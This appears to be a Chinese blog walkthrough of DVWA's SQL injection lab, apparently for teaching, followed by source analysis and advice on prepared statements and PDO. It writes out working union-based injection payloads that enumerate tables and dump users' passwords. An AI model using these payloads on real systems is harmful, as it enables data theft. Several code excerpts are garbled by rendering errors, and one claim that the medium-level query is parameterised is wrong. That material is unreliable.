DVWA靶场通关——SQL Injection篇
一,Low难度下union+get+字符串+select****注入
1,首先手工注入判断是否存在SQL注入漏洞,输入1
这是正常回显的结果,再键入1’
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’’ at line 1
发生报错,再键入1"
结果并不报错,这说明单引号的存在破坏了原有语句的闭合;双引号就没有破坏,被当成字符串内容执行。那么推断闭合方式为单引号
2,猜测这是一个经典sql查询语句。通过order by判断至少存在几个字段
1’ order by 2#
至少存在两个字段,
1’ order by 3#
不存在第三个字段,那么就只有两个字段
3,接着使用union操作符判断回显点 1’ union select 1,2#
由此可以看到存在两个回显点,接着参考数据库名和版本
1’ union select database(),version()#
4,对查询语句的限制并不多,可以用union语句开始爆库。
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
使用user表,再报user表下字段名
1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#
5,最后就爆破出用户和密码字段的内容了,并且使它们成对显示
1’ union select user,password from users#
由此,成功通关
查看并分析源码内容
该PHP代码段的主要功能是根据用户输入的id从数据库中查询用户的first_name和last_name,并将结果显示给用户。代码支持两种数据库:MySQL和SQLite。
代码结构
- 输入处理:通过$_REQUEST[‘Submit’]判断是否提交了表单,并获取用户输入的id。
- 数据库选择:根据$_DVWA[‘SQLI_DB’]的值选择使用MySQL还是SQLite。
- 查询执行:
- MySQL:使用mysqli_query执行SQL查询,并通过mysqli_fetch_assoc获取结果。
- SQLite:使用SQLite3对象执行查询,并通过fetchArray获取结果。
- 结果显示:将查询结果格式化为HTML并输出。
安全问题
该代码存在严重的SQL注入漏洞,主要问题在于用户输入的id直接拼接到SQL查询语句中,未进行任何过滤或转义处理。攻击者可以通过构造恶意输入来执行任意SQL命令,从而获取或篡改数据库中的数据。
改进建议
- 使用预处理语句:对于MySQL,可以使用mysqli_prepare和mysqli_stmt_bind_param来防止SQL注入。对于SQLite,可以使用SQLite3Stmt类。
- 输入验证和过滤:对用户输入进行严格的验证和过滤,确保输入的id是合法的整数。
- 错误处理:改进错误处理机制,避免在生产环境中暴露详细的错误信息。
查看源码查询语句
KaTeX parse error: Expected group as argument to '\=' at position 69: …ERE user\_id \= ̲'id’;";
r e s u l t = m y s q l i _ q u e r y ( result = mysqli\_query( result=mysqli_query(GLOBALS[“___mysqli_ston”], q u e r y ) o r d i e ( ′ < p r e > ′ . ( ( i s _ o b j e c t ( query ) or die( '<pre>' . ((is\_object( query)ordie(′<pre>′.((is_object(GLOBALS[“___mysqli_ston”])) mysqli_error(KaTeX parse error: Undefined control sequence: \[ at position 8: GLOBALS\̲[̲"\_\_\_mysqli\_…___mysqli_res = mysqli_connect_error()) $___mysqli_res : false)) . ‘’ );
这段代码是一个使用PHP和MySQL进行数据库查询的示例。它从users表中选择first_name和last_name,条件是user_id等于变量$id的值。
潜在的安全问题
该代码存在SQL注入的潜在风险,因为 i d 变量直接嵌入到 S Q L 查询字符串中,没有进行任何形式的转义或预处理。如果 id变量直接嵌入到SQL查询字符串中,没有进行任何形式的转义或预处理。如果 id变量直接嵌入到SQL查询字符串中,没有进行任何形式的转义或预处理。如果id的值来自用户输入,攻击者可以通过构造恶意输入来执行任意SQL命令。
改进建议
为了防止SQL注入,建议使用预处理语句(Prepared Statements)和参数绑定。以下是改进后的代码示例:
s t m t = m y s q l i _ p r e p a r e ( stmt = mysqli\_prepare( stmt=mysqli_prepare(GLOBALS[“___mysqli_ston”], “SELECT first_name, last_name FROM users WHERE user_id = “);
mysqli_stmt_bind_param($stmt, “i”, i d ) ; m y s q l i _ s t m t _ e x e c u t e ( id); mysqli\_stmt\_execute( id);mysqli_stmt_execute(stmt);
r e s u l t = m y s q l i _ s t m t _ g e t _ r e s u l t ( result = mysqli\_stmt\_get\_result( result=mysqli_stmt_get_result(stmt);
if (!KaTeX parse error: Expected '}', got 'EOF' at end of input: … mysqli\_error(GLOBALS[”___mysqli_ston”]) . ‘’);
}
解释
- 预处理语句:mysqli_prepare函数创建一个预处理语句,其中是占位符,用于替换实际的参数。
- 参数绑定:mysqli_stmt_bind_param函数将变量 i d 绑定到预处理语句中的占位符。 " i " 表示 id绑定到预处理语句中的占位符。"i"表示 id绑定到预处理语句中的占位符。"i"表示id是一个整数。
- 执行语句:mysqli_stmt_execute函数执行预处理语句。
- 获取结果:mysqli_stmt_get_result函数获取查询结果。
- 错误处理:如果查询失败,使用mysqli_error函数获取错误信息并终止脚本。
通过这种方式,可以有效防止SQL注入攻击,提高代码的安全性。
二,Medium难度下union+post+整数型+select注入
1,该网页仅允许我们通过下拉表单的格式提交数据
2,可以挂上burpsuite拦截一个包分析一下,
3,那么就可以知到网页使用POST请求方式提交查询语句,并且固定格式为id=表达数据&Submit=Submit。那么这个POST型注入可以用两种工具解:burp suite和hackbar。为了简单这里使用hackbar
判断闭合方式,输入1’
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 1
发生报错,再输入1"还是发生报错。当知道是下拉表达方式提交数据,其实就能判断出是数字型注入了
4,order by操作符判断数据表有几列
id=1 order by 2&Submit=Submit
正常回显,证明至少有2列。id=1 order by 3&Submit=Submit
发生报错,说明数据表只有两列
5,union操作符确定回显位置 id=1 union select 1,2&Submit=Submit
由此就知道了1,2两个位置都能正常回显数据,再爆出数据库名和数据库版本
id=1 union select database(),version()&Submit=Submit
6,开始爆破数据库中数据表名。
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()&Submit=Submit
从users数据表里面爆出所有字段名
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’&Submit=Submit
发生报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘users’’ at line 1
错误信息提示在’‘users’'附近有语法问题,可以尝试将users经十六进制编码为0x7573657273以绕过对表名的过滤
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273&Submit=Submit
再爆出user,password数据并且使其成对显示
id=1 union select user,password from users&Submit=Submit
成功爆出账户和密码信息
查看并分析源码内容
- 表单提交处理:
- 代码首先检查是否提交了表单(通过$_POST[‘Submit’]是否设置来判断)。
- 如果表单提交,获取用户输入的id,并使用mysqli_real_escape_string函数对输入进行转义,以防止SQL注入。
- 数据库查询:
- 根据$_DVWA[‘SQLI_DB’]的值(MYSQL或SQLITE),代码分别处理MySQL和SQLite数据库的查询。
- 对于MySQL数据库,使用mysqli_query执行查询,并使用mysqli_fetch_assoc获取结果。
- 对于SQLite数据库,使用$sqlite_db_connection->query执行查询,并使用fetchArray获取结果。
- 结果显示:
- 查询结果通过循环遍历,将每个用户的first_name和last_name格式化后显示在页面上。
- 统计用户数量:
- 代码最后执行一个查询,统计users表中的用户总数,并将结果存储在$number_of_rows变量中。
- 数据库连接关闭:
- 代码在最后关闭了MySQL数据库连接(mysqli_close)。
改进建议
- 使用预处理语句:
- 对于MySQL,建议使用mysqli_prepare和mysqli_stmt_bind_param来执行查询。
- 对于SQLite,可以使用sqlite3_prepare和sqlite3_bind_param。
- 错误处理:
- 在生产环境中,建议捕获异常并记录日志,而不是直接输出错误信息。
- 代码结构优化:
- 将数据库连接和查询逻辑封装到函数或类中,提高代码的可维护性和可读性。
medium难度和low的php****源码相比
输入处理方式
在第一段代码中, i d 变量直接从 id变量直接从 id变量直接从_REQUEST数组中获取,并且没有进行任何转义或过滤处理。这意味着$id变量可能包含用户输入的恶意数据,存在SQL注入风险。
$id = $_REQUEST[ ‘id’ ];
在第二段代码中, i d 变量同样从 id变量同样从 id变量同样从_POST数组中获取,但在传递给SQL查询之前,使用mysqli_real_escape_string函数对其进行了转义处理,从而减少了SQL注入的风险。
$id = $_POST[ ‘id’ ];
i d = m y s q l i _ r e a l _ e s c a p e _ s t r i n g ( id = mysqli\_real\_escape\_string( id=mysqli_real_escape_string(GLOBALS[“___mysqli_ston”], $id);
SQL查询语句
在第一段代码中,SQL查询语句直接将$id变量嵌入到字符串中,这可能导致SQL注入攻击。
q u e r y = " S E L E C T f i r s t _ n a m e , l a s t _ n a m e F R O M u s e r s W H E R E u s e r _ i d = ′ query = "SELECT first\_name, last\_name FROM users WHERE user\_id = ' query="SELECTfirst_name,last_nameFROMusersWHEREuser_id=′id’;";
在第二段代码中,SQL查询语句将$id变量作为参数传递,而不是直接嵌入到字符串中,这使得SQL注入攻击更难以成功。
$query = “SELECT first_name, last_name FROM users WHERE user_id = $id;”;
数据库连接关闭
两段代码在处理完数据库查询后都关闭了数据库连接,这一点是相同的。
mysqli_close($GLOBALS[“___mysqli_ston”]);
总结
- 安全性:第二段代码通过使用mysqli_real_escape_string函数对用户输入进行转义处理,显著提高了代码的安全性,减少了SQL注入的风险。
- 输入来源:第一段代码从 _ R E Q U E S T 数组中获取输入,而第二段代码从 \_REQUEST数组中获取输入,而第二段代码从 _REQUEST数组中获取输入,而第二段代码从_POST数组中获取输入,后者更明确地限制了输入来源。
- SQL查询:第二段代码的SQL查询语句更安全,因为它避免了直接将用户输入嵌入到查询字符串中。
三,low难度下
1,观察一下页面,发现是给定一个弹窗让我们change ID
直接输入1的效果如下
burpsuite拦截直接抓个包看看
当我在弹窗里面输入1测试,发现提交请求方式变成了POST
2,判断一下字符串闭合方式,输入1’
发生报错,再输入1"
没有发生报错,那么猜测为闭合方式为单引号(输入1’#就能不报错证明)
3,order by判断存在字段数 1’ order by 2#
证明至少有2列存在,再输入 1’ order by 3#
那么该数据表就只有两列
4,union操作符判断数据回显位置
回显位置存在两个,爆一下数据库名和数据库版本
1’ union select database(),version()#
5,爆出数据表名
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
再爆数据库名
1’ union select 1,group_concat(column_name) from information_schema.columns where column_name=‘users’#
爆出用户名和密码
1’ union select user,password from users #
成功通关
查看并分析源码内容
安全性问题
- SQL注入漏洞:代码中直接将用户输入的$id变量插入到SQL查询中,存在SQL注入风险。攻击者可以通过构造恶意输入来执行任意SQL命令。
q u e r y = " S E L E C T f i r s t _ n a m e , l a s t _ n a m e F R O M u s e r s W H E R E u s e r _ i d = ′ query = "SELECT first\_name, last\_name FROM users WHERE user\_id = ' query="SELECTfirst_name,last_nameFROMusersWHEREuser_id=′id’ LIMIT 1;";
解决方法:使用预处理语句(Prepared Statements)来防止SQL注入。 - 错误信息暴露:代码中直接将数据库错误信息输出到前端,可能会暴露敏感信息给攻击者。
or die( ‘Something went wrong.
’ );
解决方法:记录错误信息到日志文件,而不是直接输出到前端。
代码优化建议
- 代码格式化:代码中的双括号{{和}}是多余的,可以删除以提高代码可读性。
- 错误处理:在SQLite部分,错误处理不够完善,可以改进以提供更详细的错误信息。
- 数据库连接管理:在MySQL部分,数据库连接的关闭操作可以更简洁地实现。
四,impossible难度下
<<DVWA靶场——impossible难度SQL注入的源码分析.md>>
代码功能概述
该PHP代码的主要功能是根据用户提供的id参数,从数据库中查询对应的用户信息(包括first_name和last_name),并将查询结果显示给用户。代码支持两种数据库类型:MySQL和SQLite。
安全措施
- Anti-CSRF Token: 代码中使用了checkToken函数来验证用户提交的user_token是否与session_token匹配,以防止跨站请求伪造(CSRF)攻击。
- 输入验证: 代码通过is_numeric函数检查id是否为数字,并使用intval将其转换为整数,以防止SQL注入攻击。
- 参数化查询: 无论是MySQL还是SQLite,代码都使用了参数化查询(Prepared Statements)来执行SQL查询,进一步防止SQL注入攻击。
数据库操作
- MySQL:
- 使用PDO(PHP Data Objects)进行数据库操作。
- 通过bindParam方法将id参数绑定到SQL查询中。
- 执行查询后,检查返回的行数是否为1,以确保只返回一条记录。
- SQLite:
- 使用SQLite3扩展进行数据库操作。
- 通过bindValue方法将id参数绑定到SQL查询中。
- 由于SQLite3没有直接获取行数的方法,代码通过检查返回的列数来确保查询结果的正确性。
输出结果
- 如果查询成功,代码将用户的id、first_name和last_name以HTML格式输出到页面上。
- 如果查询失败或没有找到匹配的记录,代码不会输出任何信息。
数据库PDO技术
根据搜索结果,我们可以了解到,PDO(PHP Data Objects)是PHP中用于数据库操作的一种技术。以下是对数据库PDO技术的详细介绍:
1.什么是PDO?
PDO是PHP内置的一个数据库抽象层,它提供了一个统一的数据库访问接口,支持多种数据库管理系统(如MySQL、PostgreSQL等)。使用PDO,开发者可以更轻松地连接数据库、执行查询,并处理结果集。
2.安装和配置PDO
在使用PDO之前,需要确保PHP环境中已启用PDO扩展。通常,PDO是PHP默认安装的一部分,但可以在php.ini文件中检查以下行是否被注释:
extension=pdo_mysql
3.建立数据库连接
使用PDO连接数据库非常简单。以下是一个基本的连接示例:
try {$pdo = new PDO(‘mysql:host=localhost;dbname=testdb’, ‘username’, ‘password’);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
echo '连接失败: ’ . $e->getMessage();
}
在这个示例中,我们使用mysql:host和dbname来指定数据库的主机和名称,并设置错误模式,以便捕获异常。
4.使用预处理语句防止SQL注入
为了安全地执行数据库操作,建议使用预处理语句。预处理语句允许我们在执行查询时将参数绑定,从而避免SQL注入攻击。以下是一个INSERT语句的示例:
$stmt = $pdo->prepare(‘INSERT INTO users (name, email) VALUES (:name, :email)’);
$stmt->execute([‘name’ => $userName, ‘email’ => $userEmail]);
在这个示例中,:name和:email是参数占位符,实际的值在执行时通过关联数组传入。
5.更新和删除数据
更新和删除数据同样可以使用预处理语句。例如:
// 更新用户信息
$stmt = $pdo->prepare(‘UPDATE users SET email=:email WHERE name=:name’);
$stmt->execute([‘email’ => $newEmail, ‘name’ => $userName]);
// 删除用户
$stmt = $pdo->prepare(‘DELETE FROM users WHERE name=:name’);
$stmt->execute([‘name’ => $userName]);
6.事务处理
在涉及多个数据库操作时,使用事务可以确保数据一致性。如果其中一条操作失败,可以回滚所有操作。以下是事务处理的示例:
try {// 开始事务
$pdo->beginTransaction();
// 执行多个操作
$stmt1 = $pdo->prepare(‘INSERT INTO users (name, email) VALUES (:name, :email)’);
$stmt1->execute([‘name’ => ‘Alice’, ‘email’ => ‘alice@example.com’]);
$stmt2 = $pdo->prepare(‘INSERT INTO orders (user_id, product) VALUES (:user_id, :product)’);
$stmt2->execute([‘user_id’ => $pdo->lastInsertId(), ‘product’ => ‘Product A’]);
// 提交事务
$pdo->commit();
} catch (Exception $e) {
// 回滚事务
$pdo->rollBack();
echo '操作失败: ’ . $e->getMessage();
}
在这个示例中,我们开始一个事务并执行多个操作。如果任何一条操作失败,我们将回滚事务,确保数据的一致性。
7.错误处理
PDO提供了强大的错误处理机制。可以通过设置错误模式来捕获异常,确保我们能及时处理错误:
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
try {// 数据库操作
} catch (PDOException $e) {
echo '数据库错误: ’ . $e->getMessage();
}
8.最佳实践
- 使用参数化查询:总是使用预处理语句来执行查询,以避免SQL注入。
- 确保正确配置数据库连接和错误处理。
- 使用事务处理来确保数据一致性。
通过以上介绍,我们可以看到PDO技术在PHP数据库操作中的重要性和实用性。它不仅简化了数据库操作,还提供了安全的机制来防止SQL注入和其他潜在的安全问题。
相关文章:
DVWA靶场通关——SQL Injection篇
一,Low难度下unionget字符串select****注入 1,首先手工注入判断是否存在SQL注入漏洞,输入1 这是正常回显的结果,再键入1’ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ver…...
DeepSeek 助力 Vue 开发:打造丝滑的步骤条
前言:哈喽,大家好,今天给大家分享一篇文章!并提供具体代码帮助大家深入理解,彻底掌握!创作不易,如果能帮助到大家或者给大家一些灵感和启发,欢迎收藏关注哦 💕 目录 Deep…...
今日学习总结
1.完成了P2242公路维修问题 2.完成了P10605下头论文 1.P2242 思考:建立单向链表,使用qsort降序排序。 #include<stdio.h> #include<stdlib.h> #include<stdbool.h> #include<string.h> int n,m; int a[15005],b[15005],ans;…...
Transformer 的辉煌与大模型方向确立,点燃AGI之火把
GPT3,指明大模型发展方向,点燃大模型软件行业繁荣之火,目前大模型有100万个。 DeepSeek-V3,指明下一个阶段大模型发张方向,破壁: 资金壁垒:训练成本降低,适配丰富硬件,总…...
DeepSeek-Coder系列模型:智能编程助手的未来
文章目录 一、模型架构与核心功能1. 模型架构2. 核心功能 二、多语言支持与代码生成1. Python代码生成2. Java代码生成3. C代码生成4. JavaScript代码生成 三、仓库级代码理解1. 代码结构分析2. 上下文理解 四、FIM填充技术1. 函数自动填充2. 代码补全 五、应用场景1. 代码补全…...
微信小程序longpress以及touchend的bug,touchend不触发,touchend不执行
核心原因:bind:touchend里面不能放wx:if 举例: <view bind:longpress"longpressBtn" bind:touchend"touchendBtn"><view wx:if"{{isRecording}}" >松开发送</view><view wx:else"…...
多租户架构设计与实现:基于 PostgreSQL 和 Node.js
多租户架构设计与实现:基于 PostgreSQL 和 Node.js 引言 多租户架构(Multi-tenancy)是现代 SaaS(Software as a Service)应用的核心设计模式之一。它允许多个租户共享同一套应用实例,同时确保数据隔离和安全性。本文将详细介绍多租户架构的设计方案,并基于 PostgreSQL…...
四、OSG学习笔记-基础图元
前一章节: 三、OSG学习笔记-应用基础-CSDN博客https://blog.csdn.net/weixin_36323170/article/details/145514021 代码:CuiQingCheng/OsgStudy - Gitee.com 一、绘制盒子模型 下面一个简单的 demo #include<windows.h> #include<osg/Node&…...
windows平台本地部署DeepSeek大模型+Open WebUI网页界面(可以离线使用)
环境准备: 确定部署方案请参考:DeepSeek-R1系列(1.5b/7b/8b/32b/70b/761b)大模型部署需要什么硬件条件-CSDN博客 根据本人电脑配置:windows11 + i9-13900HX+RTX4060+DDR5 5600 32G内存 确定部署方案:DeepSeek-R1:7b + Ollama + Open WebUI 1. 安装 Ollama Ollama 是一…...
功能架构元模型
功能架构的元模型是对功能架构进行描述和建模的基础框架,它有助于统一不同团队对系统的理解,并为系统的设计和开发提供一致的标准和规范。虽然具体的元模型可能因不同的应用领域和特定需求而有所差异,但一般来说,功能架构的元模型可以涵盖以下几个方面: 组件/模块元模型:…...
云计算——AWS Solutions Architect – Associate(saa)4.安全组和NACL
安全组一充当虚拟防火墙对于关联实例,在实例级别控制入站和出站流量。 网络访问控制列表(NACL)一充当防火墙关联子网,在子网级别控制入站和出站流量。 在专有网络中,安全组和网络ACL(NACL)一起帮助构建分层网络防御。 安全组在实例级别操作…...
Fiddler Classic(HTTP流量代理+半汉化)
目录 一、关于Fiddler (一) Fiddler Classic (二) Fiddler Everywhere (三) Fiddler Everywhere Reporter (四) FiddlerCore (五) 总结 二、 软件安全性 1. 软件安装包 2. 软件汉化dll 三、安装与半汉化 1. 正常打开安装包点击下一步安装即可,安装路径自…...
【hive】记一次hiveserver内存溢出排查,线程池未正确关闭导致
一、使用 MemoryAnalyzer软件打开hprof文件 很大有30G,win内存24GB,不用担心可以打开,ma软件能够生成索引文件,逐块分析内存,如下图。 大约需要4小时。 overview中开不到具体信息。 二、使用Leak Suspects功能继续…...
MySQL的字段类型
MySQL 字段类型可以简单分为三大类 数值类型:整型(TINYINT、SMALLINT、MEDIUMINT、INT 和 BIGINT)、浮点型(FLOAT 和 DOUBLE)、定点型(DECIMAL)字符串类型:CHAR、VARCHAR、TINYTEXT…...
HTML之JavaScript运算符
HTML之JavaScript运算符 1.算术运算符 - * / %除以0,结果为Infinity取余数,如果除数为0,结果为NaN NAN:Not A Number2.复合赋值运算符 - * / %/ 除以0,结果为Infinity% 如果除数为0,结果为NaN NaN:No…...
UE5--浅析委托原理(Delegate)
委托概述 委托是一种用于事件处理的机制。通过使用委托,可以将一个或多个函数绑定到一个事件上,在事件触发时自动调用这些函数。代理也叫做委托,比如:跳,跑,开枪,伤害等响应,就是注册一个委托回调,其作用就是提供一种消息机制,都知道消息的传递需要发送方和接收方,…...
Android13-系统服务大管家-ServiceManager进程-启动篇
文章目录 关注 ServiceMager 原因ServerManager需要掌握的知识资料参考ServiceManager 进程启动启动脚本涉及到的相关源码文件源码跟踪ServiceManager脚本启动位置ServiceManager关联脚本 Native层源码分析main.cpp流程打开驱动 initWithDriverinitmakeProcessState 构造方法op…...
网络安全溯源 思路 网络安全原理
网络安全背景 网络就是实现不同主机之间的通讯。网络出现之初利用TCP/IP协议簇的相关协议概念,已经满足了互连两台主机之间可以进行通讯的目的,虽然看似简简单单几句话,就描述了网络概念与网络出现的目的,但是为了真正实现两台主机…...
Mac(m1)本地部署deepseek-R1模型
1. 下载安装ollama 直接下载软件,下载完成之后,安装即可,安装完成之后,命令行中可出现ollama命令 2. 在ollama官网查看需要下载的模型下载命令 1. 在官网查看deepseek对应的模型 2. 选择使用电脑配置的模型 3. copy 对应模型的安…...
从零复现DeepSeek R1:从V3中对MoE、MLA、MTP的实现,到Open R1对R1中SFT、GRPO的实现
前言 虽然我司从23年起,便逐步从教育为主转型到了科技为主,但不代表教育业务便没有了 随着DeepSeek特别是R1、其次V3模型的大火,我司七月在线的大模型线上营群里一学员朋友DIFY问道:校长好,deepseek 的课程目前有多少…...
[EAI-033] SFT 记忆,RL 泛化,LLM和VLM的消融研究
Paper Card 论文标题:SFT Memorizes, RL Generalizes: A Comparative Study of Foundation Model Post-training 论文作者:Tianzhe Chu, Yuexiang Zhai, Jihan Yang, Shengbang Tong, Saining Xie, Dale Schuurmans, Quoc V. Le, Sergey Levine, Yi Ma 论…...
示例代码:C# MQTTS双向认证(客户端)(服务器EMQX)
初级代码游戏的专栏介绍与文章目录-CSDN博客 我的github:codetoys,所有代码都将会位于ctfc库中。已经放入库中我会指出在库中的位置。 这些代码大部分以Linux为目标但部分代码是纯C的,可以在任何平台上使用。 源码指引:github源…...
自制游戏——斗罗大陆
很简陋,没有图,请见谅 // mine[0] 级数 // mine[1] 战力 //mine[2] 1 白虎 //mine[2] 2 昊天锤 //mine[2] 3 蓝银草 #include <bits/stdc.h> using namespace std; int mine[100],live3, dou 1, luo 1, da 1, bag[1000], huan 0, lia…...
数据治理双证通关经验分享 | CDGA/CDGP备考全指南
历经1个月多的系统准备,本人于2024年顺利通过DAMA China的CDGA(数据治理工程师)和CDGP(数据治理专家)双认证。现将备考经验与资源体系化整理,助力从业者高效通关。 🌟 认证价值与政策背景 根据…...
Vue全流程--Vue3.0与Vue2.0响应式原理对比
Vue2中数据的响应式 需要使用Vue.set这么一个api,修改数据 需要使用Vue.delete这么一个api,删除数据 数据代理这个当面的理解可以看看我前面文章Vue全流程--数据代理的理解以及在Vue中的应用-CSDN博客 Vue3中数据的响应式 Vue3使用proxy这个api实现…...
Spring中都应用了哪些设计模式?
好的!以下是您提到的八种设计模式在 Spring 中的简单示例: 1. 简单工厂模式 简单工厂模式通过传入参数来决定实例化哪个类。Spring 中的 BeanFactory 就是简单工厂模式的应用。 示例代码: // 1. 创建接口和具体实现类 public interface A…...
fastjson2学习大纲
一、基础篇 - JSON与fastjson2核心概念 JSON基础 JSON语法规范(RFC 8259)JSON数据类型与Java类型对应关系序列化/反序列化核心概念 fastjson2入门 与fastjson1的主要区别核心优势: 性能提升(JSONB二进制协议)更完善的…...
k8s部署elasticsearch
前置环境:已部署k8s集群,ip地址为 192.168.10.1~192.168.10.5,总共5台机器。 1. 创建provisioner制备器(如果已存在,则不需要) 制备器的具体部署方式,参考我之前的文章:k8s部署rabbitmq-CSDN博客 2. 编写wms-elk-data-sc.yaml配置文件 apiVersion: storage.k8s.io/…...
BS架构(笔记整理)
楔子.基本概念 1.在网络架构中: 服务器通常是集中式计算资源,负责处理和存储数据;客户机是请求这些服务的终端设备,可能是个人电脑或移动设备;浏览器则是客户机上用来与服务器交互的工具,负责展示网页内容…...
从基础到人脸识别与目标检测
前言 从本文开始,我们将开始学习ROS机器视觉处理,刚开始先学习一部分外围的知识,为后续的人脸识别、目标跟踪和YOLOV5目标检测做准备工作。我采用的笔记本是联想拯救者游戏本,系统采用Ubuntu20.04,ROS采用noetic。 颜…...
ArcGIS Pro SDK (二十七)自定义许可
ArcGIS Pro SDK (二十七)自定义许可 环境:Visual Studio 2022 + .NET6 + ArcGIS Pro SDK 3.0 文章目录 ArcGIS Pro SDK (二十七)自定义许可1 在Config.xaml中添加扩展配置2 在Module1.cs中实现接口IExtensionConfig1 在Config.xaml中添加扩展配置 <modules><inse…...
一、kubernetes k8s
k8s概述: k8s的全称:kubernetes k8s k8s的版本:1.30 1.20------------用的最多的版本,1.18-1.21 1.24------------>k8s的镜像不再使用docker,containerd k8s的作用: 用于自动部署,自动扩展和管理“容器化应…...
C#、.Net 中级高级架构管理面试题杂烩
1、简述值类型和引用类型的区别 存储位置:值类型变量直接存储数据的值,通常存储在栈上;引用类型变量存储的是对象在堆上的引用地址。 内存管理:值类型的内存由系统自动管理,当超出作用域时自动释放;引用类…...
ArrayList和LinkedList有什么区别?在什么情况下使用ArrayList更高效?
ArrayList和LinkedList在Java中是两种常用的数据结构,分别基于数组和链表实现。它们在性能、内存使用和适用场景上各有特点。 ArrayList与LinkedList的主要区别 数据结构: ArrayList:基于动态数组实现,元素存储在连续的内存空间…...
KITE提示词框架:引导大语言模型的高效新工具
大语言模型的应用日益广泛。然而,如何确保这些模型生成的内容在AI原生应用中符合预期,仍是一个需要不断探索的问题。以下内容来自于《AI 原生应用开发:提示工程原理与实战》一书(京东图书:https://item.jd.com/1013604…...
Spring 整合 MyBatis:核心知识点详解
一、Spring 整合 MyBatis 的优势 依赖注入:Spring 的 IOC 容器可以管理 MyBatis 的组件(如 SqlSessionFactory、Mapper 接口等),减少手动创建对象的繁琐。 事务管理:Spring 提供了声明式事务管理,可以轻松…...
centos docker安装
一、前置条件 安装gcc和c: yum -y install gcc yum -y install gcc-c 二、卸载旧版本 如果之前安装过Docker,需要先卸载旧版本: sudo yum remove docker \docker-client \docker-client-latest \docker-common \docker-latest \docker-latest-logr…...
推荐一款 免费的SSL,自动续期
支持自动续期 、泛域名 、可视化所有证书时效性 、可配置CDN 的一款工具。免费5个泛域名和1个自动更新。 链接 支持:nginx、通配符证书、七牛云、腾讯云、阿里云、CDN、OSS、LB(负载均衡) 执行自动部署脚本 提示系统过缺少crontab 安装cro…...
python-leetcode 24.回文链表
题目: 给定单链表的头节点head,判断该链表是否为回文链表,如果是,返回True,否则,返回False 输入:head[1,2,2,1] 输出:true 方法一:将值复制到数组中后用双指针法 有两种常用的列表实现&#…...
利用kali linux 进行自动化渗透测试
本方案旨在自动化创建渗透测试全流程 一、架构 1.智能信息收集体系 class IntelligentOSINT:def __init__(self, target):self.target targetself.intelligence_sources [OSINT_Platforms,DeepWeb_Crawlers, SocialMedia_Trackers,ML_Correlation_Engine]def advanced_col…...
蓝桥杯试题:冒泡排序 选择排序
一、问题描述 在一个神秘的岛屿上,有一支探险队发现了一批宝藏,这批宝藏是以整数数组的形式存在的。每个宝藏上都标有一个数字,代表了其珍贵程度。然而,由于某种神奇的力量,这批宝藏的顺序被打乱了,探险队…...
curl与telnet的区别
协议支持:curl支持多种协议,如HTTP、HTTPS、FTP等,而telnet主要用于基于TCP协议的连接。 功能:curl是一个功能强大的工具,可以用来发送各种HTTP请求、下载文件等,而telnet主要用于在远程服务器上进行简单的…...
防火墙综合练习2
准备阶段 实验拓扑图如下: 试验要求如下: 需求一:完成相关配置 需求二:配置DHCP协议 需求三:防火墙安全区域配置 需求四:防火墙地址组信息 需求五:管理员 需求六:用户认证…...
leetcode_26删除有序数组中的重复项
1. 题意 给定一个重复数组,删除其中的重复项目。 2. 题解 双指针 一个指针指向有序不重复数组的最后一个数,另外一个数遍历整个数组,若两个指针对应用的数不相同,有序数组的指针右移,将数填入。 代码一 class Sol…...
SQLServer的创建,表创建,主键,约束,模糊查询
设置 注意: 设置完成之后 重新启动 创建数据库 注意: 这个目标路径必须要有该文件名的文件夹 -- 指向 master 数据库,告诉它我们要创建一个新的数据库操作了 use master go-- 创建数据库 create database StudentManageDB on primary (-- 以下四个组成部分缺一不可…...
钉钉位置偏移解决,钉钉虚拟定位打卡
虚拟定位打卡工具 一,介绍免费获取工具 一,介绍 提到上班打卡,职场人的内心戏估计能拍成一部连续剧。打卡,这俩字仿佛自带“紧箍咒”,让无数打工人又爱又恨。想象一下,你气喘吁吁地冲进办公室,…...
自有服务与软件包
—— 小 峰 编 程 目录 编辑 一、自有服务概述 二、systemctl管理服务命令 1、显示服务 2、查看启动和停止服务 3、服务持久化 三、常用自有服务(ntp,firewalld,crond) 1、ntp时间同步服务 1)NTP同步服务器原理 2)到哪里去找NPT服务…...
PHP之hyperf学习笔记
Hyperf Model,Dao,Service,Contronller 路由 使用文件来配置路由,就是和laravel一样的 Router::addGroup(["middleware" > ["web", "auth"],"namespace" > "Hyperf\HttpServer\Contr…...
C++STL(六)——list模拟
目录 本次所需实现的三个类一、结点类的模拟实现构造函数 二、迭代器类的模拟实现为什么有迭代器类迭代器类的模板参数说明构造函数运算符的重载- -运算符的重载和!运算符的重载*运算符的重载->运算符的重载引入模板第二个和第三个参数 三、list的模拟实现3.1 默认成员函数构…...
Spring MVC 拦截器(Interceptor)与过滤器(Filter)的区别?
1、两者概述 拦截器(Interceptor): 只会拦截那些被 Controller 或 RestController 标注的类中的方法处理的请求,也就是那些由 Spring MVC 调度的请求。过滤器(Filter): 会拦截所有类型的 HTTP …...